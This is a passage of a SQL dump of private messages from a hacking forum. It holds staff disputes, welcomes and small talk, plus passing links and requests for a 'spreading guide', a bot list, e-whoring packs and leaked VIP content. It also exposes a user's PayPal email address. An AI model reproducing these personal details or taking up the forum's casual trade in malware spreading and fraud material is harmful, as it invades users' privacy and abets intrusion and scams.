'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: hey', '0', '[quote=\'Sin Cara\'] [quote=\'HoverCatz\'] [quote=\'Sin Cara\'] [quote=\'HoverCatz\'] [quote=\'Sin Cara\'] i need a free usa vps ??? do you have? [/quote] Hey :) I only know about One free vps, but i dont know where its located, and its Linux <.< [/quote] link???? [/quote] sorry i need vpn not vps!!! https://chunkhost.com/ [/quote] [/quote] http://l33thacking.com/showthread.php?tid=123&pid=711', '1346149043', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('964', '67', '138', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"138\";}}', '2', 'Coders', '0', 'Welcome in the Coders club! :)', '1346170114', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('965', '67', '67', '138', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Spreading Guide', '0', 'Here you go http://www.mediafire.com/view/?p01ua4wlwbjqgqc Please +rep if you can.', '1346171824', '0', '1', '0', '1', '0', '2', '1346171859'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('966', '138', '67', '138', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Spreading Guide', '0', 'Here you go http://www.mediafire.com/view/?p01ua4wlwbjqgqc Please +rep if you can.', '1346171824', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('968', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] You want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me. [/quote] I understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. Why? [/quote] I removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. ', '1346177401', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('970', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Threads', '0', '[quote=\'t3h jok3r\'] I was wondering if you could help me make new threads. We have enough posts, we need more threads. The more threads we have the more members we would get. [/quote] Yeah sure. I can make new threads and tutorials. But one thing I do not do is copy threads and tutorials which are made by other guys. ', '1346179454', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('977', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] You want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me. [/quote] I understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. Why? [/quote] I removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. [/quote] Sure, I would still like to be your friend. [/quote] So no to everything else?', '1346195124', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('980', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] You want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me. [/quote] I understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. Why? [/quote] I removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. [/quote] Sure, I would still like to be your friend. [/quote] So no to everything else? [/quote] No to? [/quote] Eventually becoming partners on here again. And do you understand the graphics award thing?', '1346198380', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('995', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Threads', '0', '[quote=\'t3h jok3r\'] [quote=\'sirchamp\'] [quote=\'t3h jok3r\'] I was wondering if you could help me make new threads. We have enough posts, we need more threads. The more threads we have the more members we would get. [/quote] Yeah sure. I can make new threads and tutorials. But one thing I do not do is copy threads and tutorials which are made by other guys. [/quote] Stop crying on about Triple H. [/quote] Your forum already has a bad reputation. You dont want more', '1346252928', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('999', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Threads', '0', '[quote=\'t3h jok3r\'] [quote=\'sirchamp\'] [quote=\'t3h jok3r\'] [quote=\'sirchamp\'] [quote=\'t3h jok3r\'] I was wondering if you could help me make new threads. We have enough posts, we need more threads. The more threads we have the more members we would get. [/quote] Yeah sure. I can make new threads and tutorials. But one thing I do not do is copy threads and tutorials which are made by other guys. [/quote] Stop crying on about Triple H. [/quote] Your forum already has a bad reputation. You dont want more [/quote] Such as? [/quote] Actually Its the thing about triple h.', '1346254017', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1002', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] You want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me. [/quote] I understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. Why? [/quote] I removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. [/quote] Sure, I would still like to be your friend. [/quote] So no to everything else? [/quote] No to? [/quote] Eventually becoming partners on here again. And do you understand the graphics award thing? [/quote] Sure, I can\'t add you as a Admin at the moment because I\'m receiving some SQL Errors so can\'t really use the ACP. [/quote] Thanks :) II was thinking because iPod hates my guts should I make a new account? Like I would keep apathy but make a new one so that iPod will not know I is me and therefor not hate me. :3 also back in the USA yet?', '1346259582', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1004', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Dude! 0.0', '0', 'Please take off my name from the apathy demoted thread... I do not want people to know my hf name.', '1346268125', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1008', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', 'Alrighty :3 so do you think I should make a new account or change this one saying you gave my account away. But it is really me? And just so you know I am getting VIP and super VIP on sites to leak here :) [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] You want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me. [/quote] I understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. Why? [/quote] I removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. [/quote] Sure, I would still like to be your friend. [/quote] So no to everything else? [/quote] No to? [/quote] Eventually becoming partners on here again. And do you understand the graphics award thing? [/quote] Sure, I can\'t add you as a Admin at the moment because I\'m receiving some SQL Errors so can\'t really use the ACP. [/quote] Thanks :) II was thinking because iPod hates my guts should I make a new account? Like I would keep apathy but make a new one so that iPod will not know I is me and therefor not hate me. :3 also back in the USA yet? [/quote] I told you when I\'m leaving. [/quote]', '1346288353', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1013', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Threads', '0', '[quote=\'t3h jok3r\'] [quote=\'sirchamp\'] [quote=\'t3h jok3r\'] [quote=\'sirchamp\'] [quote=\'t3h jok3r\'] [quote=\'sirchamp\'] [quote=\'t3h jok3r\'] I was wondering if you could help me make new threads. We have enough posts, we need more threads. The more threads we have the more members we would get. [/quote] Yeah sure. I can make new threads and tutorials. But one thing I do not do is copy threads and tutorials which are made by other guys. [/quote] Stop crying on about Triple H. [/quote] Your forum already has a bad reputation. You dont want more [/quote] Such as? [/quote] Actually Its the thing about triple h. [/quote] The thing is that Triple H is a test account ran by an Admin on LH. Admins don\'t really have time to give out credits, because we do quick searches and then copy and paste the tutorials and we have a lot of work to do on ACP. I have issued the warning, I also contacted the Admin and told them about the credits thing and they said they will pay more attention to it because why don\'t want LH to be called a skiddies leeching forum. [/quote] Ahh okay.', '1346324692', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1017', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'L33thacking.com', '0', 'Dude do you sense something fucked up in this forum? I keep getting errors upon posting and shit.. -.- Sorry for swearing.. I\'m in a bad mood.', '1346350312', '0', '3', '1346352344', '1', '0', '2', '1346352230'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1020', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: L33thacking.com', '0', '[quote=\'iTzIpod\'] Dude do you sense something fucked up in this forum? I keep getting errors upon posting and shit.. -.- Sorry for swearing.. I\'m in a bad mood. [/quote] No errors here o.o Ill try to reply to my own thread and remove it to see if i get a error.', '1346352277', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1022', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: L33thacking.com', '0', '[quote=\'iTzIpod\'] Dude do you sense something fucked up in this forum? I keep getting errors upon posting and shit.. -.- Sorry for swearing.. I\'m in a bad mood. [/quote] Dafuq. You see the \"test .\" Thats my reply: http://gyazo.com/0e9e335a19a5debce6ceb489ee7f01d1', '1346352344', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1060', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', 'Aight so should we say you gave my account to someone else? [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Alrighty :3 so do you think I should make a new account or change this one saying you gave my account away. But it is really me? And just so you know I am getting VIP and super VIP on sites to leak here :) [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] You want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me. [/quote] I understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. Why? [/quote] I removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. [/quote] Sure, I would still like to be your friend. [/quote] So no to everything else? [/quote] No to? [/quote] Eventually becoming partners on here again. And do you understand the graphics award thing? [/quote] Sure, I can\'t add you as a Admin at the moment because I\'m receiving some SQL Errors so can\'t really use the ACP. [/quote] Thanks :) II was thinking because iPod hates my guts should I make a new account? Like I would keep apathy but make a new one so that iPod will not know I is me and therefor not hate me. :3 also back in the USA yet? [/quote] I told you when I\'m leaving. [/quote] [/quote] That\'s cool. That would be a bad idea, because if you are new and I make you an admin then people will question me how did I make a completely new member an Admin. [/quote]', '1346369559', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1087', '154', '1', '154', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: E-whoring packs site', '0', '[quote=\'t3h jok3r\'] http://darkjb.com/ Also welcome to L33THacking. [/quote]thanks brooo and cheers :D', '1346371712', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1096', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: And', '0', 'Then what should we do? iPod refuses to even give me a chance. Who is lobocca and sure I was waiting till everything got sorted to release all the stuff though. [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Aight so should we say you gave my account to someone else? [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Alrighty :3 so do you think I should make a new account or change this one saying you gave my account away. But it is really me? And just so you know I am getting VIP and super VIP on sites to leak here :) [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] You want to know why I jaw not been doing alot? MY FUCKING CLOSEST RELATIVE DIED. So ok if you do not care about our friendship I care most about my family. And my relative was one of the most important people in the world to me. [/quote] I understand what happened to your relative but what does that have to do with your abuse of powers? I can understand attitude because when people are upset they want to fuck around people and when you were messing with iTzIpod, I said nothing. I really considered you my best online friend online who I could trust, I knew reborn more longer than you but trusted you the most. First you said you are cool with iTzIpod then you go on removing his awards. Why? [/quote] I removed the graphics award because it is supposed to signify that you are good not because you have shared tutorials that are not made by you. It was not a hate action it was a realistic action because he is not amazing enough to get it. I was not hating. And yes I sorta went out of cotrol and lashed out my rage at the site and I am sorry for that. I would still like to be friends and if you want eventually partners in this again. I was teary eyed when I saw the post. You ARE my best online friend. [/quote] Sure, I would still like to be your friend. [/quote] So no to everything else? [/quote] No to? [/quote] Eventually becoming partners on here again. And do you understand the graphics award thing? [/quote] Sure, I can\'t add you as a Admin at the moment because I\'m receiving some SQL Errors so can\'t really use the ACP. [/quote] Thanks :) II was thinking because iPod hates my guts should I make a new account? Like I would keep apathy but make a new one so that iPod will not know I is me and therefor not hate me. :3 also back in the USA yet? [/quote] I told you when I\'m leaving. [/quote] [/quote] That\'s cool. That would be a bad idea, because if you are new and I make you an admin then people will question me how did I make a completely new member an Admin. [/quote] [/quote] Umm, sorry no because then people will think that LH doesn\'t respect members privacy. Also, Labrocca is working out the plugins problem that are causing the SQL Errors. Also can you be active please? [/quote]', '1346382125', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1098', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'thanks', '0', 'Here\'s my paypal fobonary@hotmail.com or do i need to make a new one?', '1346384631', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1102', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: thanks', '0', '[quote=\'iTzIpod\'] [quote=\'NXK\'] Here\'s my paypal fobonary@hotmail.com or do i need to make a new one? [/quote] It doesn\'t matter. But right now I\'m on mobilenso I don\'t know if my Paypal will work. If it does, you\'re welcome. If it doesn\'t, I\'m sorry and I will send it tomorrow morning (EST) [/quote] Alright, Ill make sure I get the money back to you soon. that 50 cent debt.', '1346385082', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1110', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Paypal', '0', '[quote=\'iTzIpod\'] Hey NXK, I have sent you .50 cents. I sent the payment to fobonary@hotmail.com Can you please confirm it? (: No probem once again. [/quote] I got it. Thank you once again! ', '1346388896', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1112', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: You have been granted an award.', '0', '[quote=\'t3h jok3r\'] You have been granted the [b]Elite[/b] award to signify your upgrade. [/quote] awesome. thanks', '1346392527', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1115', '150', '1', '150', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Welcome to L33T Hacking!', '0', '[quote=\'t3h jok3r\'] Welcome to our forum MinecraftGeek. I am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.com/showteam.php]Staff list[/url]. Feel free to view our [url=http://l33thacking.com/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents. Hope you enjoy our forums. L33T Hacking http://l33thacking.com [/quote] Thanks for the welcome I\'m MinecraftGeek from NC.', '1346417478', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1146', '2', '54', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Fw: hey', '0', '[quote=\'Mr.Omni\'] i just left to post HQ threads here... :( [/quote] What do you mean? What are you talking about ?', '1346473534', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1150', '2', '54', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: hey', '0', '[quote=\'Mr.Omni\'] [quote=\'Apathy\'] [quote=\'Mr.Omni\'] i just left to post HQ threads here... :( [/quote] What do you mean? What are you talking about ? [/quote] i will ot post HQ threads here..... due to my own forum... i have to give time yo my forum ;) [/quote] So you are leaving to your forums? Is that what you are trying to say?', '1346473754', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1154', '2', '54', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: hey', '0', '[quote=\'Mr.Omni\'] [quote=\'Apathy\'] [quote=\'Mr.Omni\'] [quote=\'Apathy\'] [quote=\'Mr.Omni\'] i just left to post HQ threads here... :( [/quote] What do you mean? What are you talking about ? [/quote] i will ot post HQ threads here..... due to my own forum... i have to give time yo my forum ;) [/quote] So you are leaving to your forums? Is that what you are trying to say? [/quote] lol.... i just left this forum for my forum.... i m owner of my own forum??? wana see it? [/quote] Sure? Are you leaving for good? Or will still be active here?', '1346474504', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1158', '160', '3', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '2', 'Hey', '0', 'Can I have your bot list? Thanks :)', '1346506583', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1160', '159', '53', '159', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'ebook', '0', ' Here you go, this is legit, its easy, no effort what so ever once you read/ try it please PM me back thanks [Spoiler] http://www.mediafire.com/?0ibug92lul999b3 [/spoiler] Make sure to say thanks, and vouch in the thread! ill give back thanks aswell! Coders wanted, working on a multi-proxy loader for this niche. [b][size=medium] Please feel free to PM me with any questions or concerns [/size][/b] ', '1346524962', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1163', '67', '67', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', ':O', '0', ':O', '1346606427', '0', '0', '0', '1', '0', '1', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1164', '67', '67', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', ':O', '0', ':O', '1346606427', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1166', '160', '61', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Skype or Aim?', '0', 'Can I talk to you on skype or aim for a sec?', '1346614845', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1170', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', ':3', '0', 'Make a leaking section. Someplace where I can put ebooks and stuff.', '1346642424', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1168', '61', '160', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '2', 'Re: Skype or Aim?', '0', 